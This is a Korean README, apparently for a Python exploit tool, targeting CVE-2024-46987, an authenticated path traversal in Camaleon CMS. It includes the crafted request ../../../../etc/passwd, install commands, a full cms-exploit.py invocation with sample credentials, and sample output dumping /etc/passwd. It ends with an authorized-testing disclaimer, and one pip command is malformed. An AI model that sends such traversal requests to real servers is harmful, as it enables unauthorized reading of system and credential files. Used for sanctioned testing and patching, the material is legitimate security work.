
Python으로 생성된 Exploit
CVE-2024-46987는 Camaleon CMS (Ruby on Rails 기반 콘텐츠 관리 시스템)의 인증된 경로 탐색 취약점(CWE-22)입니다. 이 취약점을 통해 로그인한 사용자(낮은 권한만 가진 사용자라도)는 MediaController#download_private_file 액션을 통해 서버의 임의 파일을 읽을 수 있습니다.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N유효한 자격 증명을 가진 공격자는 다음 경로로 조작된 요청을 보낼 수 있습니다: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txt또는
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
참고: 이 스크립트는 Rails 스타일 로그인 양식(user[email], user[password], authenticity_token)을 가정합니다. 대상이 사용자 정의 이름을 사용하는 경우 페이로드 필드를 조정하세요.
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
소유한 시스템 또는 테스트에 대한 명시적 서면 허가를 받은 시스템에서만 사용하십시오(예: 버그 바운티 프로그램, 내부 펜테스트, HTB와 같은 랩). 무단 사용은 법률을 위반할 수 있습니다. 저자는 오용에 대해 책임을 지지 않습니다.